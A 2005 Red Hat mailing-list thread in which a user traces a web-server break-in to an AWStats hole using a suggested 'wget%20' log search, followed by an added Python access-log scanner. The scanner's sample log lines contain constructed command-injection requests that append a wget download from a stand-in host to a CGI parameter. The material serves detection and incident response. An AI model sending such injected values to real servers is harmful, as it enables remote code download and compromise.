Unpatched security exploits? SOLVED
2005-02-04 - By Pete Deffendol
Mark J Cox wrote:
> The Red Hat Security Team have seen a small number of reports of
> compromises having a similar pattern since the start of the year. In
> all the cases so far the fault had been traced to third party web
> applications, sometimes due to badly written PHP scripts (the last one
> was a vulnerable PHP photo album application that a user had
> installed), or sometimes due to CGI programs that have had flaws.
>
> If the attacker did not manage to gain root then examining your Apache
> error and access logs may help lead you to the vulnerable script; try
> looking for a string such as "wget%20" which has been common on PHP
> attacks so far.
>
> Please let us know at secalert@(protected) (in confidence if you wish)
> if you discover the application at fault so we can track the cause of
> these issues.

Thanks for the information - your suggested search string found the source of the problem and the culprits. The break-in was due to a security hole in AWStats that was patched on Jan. 28. Upgrading to AWStats 6.3 has fixed the hole.

Pete

--
Pete Deffendol
Software Engineer
Multimedia Data Services Corp.
pete@(protected)

--
Taroon-list mailing list
Taroon-list@(protected)
http://www.redhat.com/mailman/listinfo/taroon-list
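
The access-log search suggested in the quoted message, as an added example that is not part of the original thread: it looks for the "wget%20" string in Apache access-log lines, also catching the "+" and double-encoded forms (a generalization beyond the post), and groups hits by script path so the application at fault stands out. The log lines, the script name `example.cgi`, the host name and the addresses are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Prefix shared by Apache common and combined access-log formats.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
MARKER = "wget "  # decoded form of the "wget%20" string from the post

# Constructed sample lines (documentation address ranges, hypothetical script).
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Feb/2005:10:01:02 -0700] "GET /index.html HTTP/1.1" 200 1043',
    '198.51.100.7 - - [04/Feb/2005:10:02:11 -0700] "GET /cgi-bin/example.cgi?opt=%3Bwget%20http://host.invalid/x HTTP/1.0" 200 512',
    '198.51.100.7 - - [04/Feb/2005:10:02:15 -0700] "GET /cgi-bin/example.cgi?opt=%3Bwget%2520http://host.invalid/x HTTP/1.0" 200 512',
    '203.0.113.9 - - [04/Feb/2005:10:03:00 -0700] "GET /docs/wget-manual.html HTTP/1.1" 200 2210',
]

def decode(target, rounds=2):
    """Percent-decode up to `rounds` times so double-encoded input (%2520) is caught."""
    for _ in range(rounds):
        new = unquote_plus(target)
        if new == target:
            break
        target = new
    return target

def find_suspect_scripts(lines):
    """Map each requested script path to the (client, time, status) of marked requests."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line (e.g. error-log text); skip it
        target = m.group("target")
        if MARKER in decode(target).lower():
            path = target.split("?", 1)[0]  # group by script, not by payload
            hits[path].append((m.group("client"), m.group("time"), int(m.group("status"))))
    return dict(hits)

if __name__ == "__main__":
    for path, reqs in find_suspect_scripts(SAMPLE_LOG).items():
        print(path, len(reqs), "request(s), first from", reqs[0][0], "at", reqs[0][1])
```

A 200 status on a flagged request means the script was reached and answered, which makes that script the first one to check for available patches.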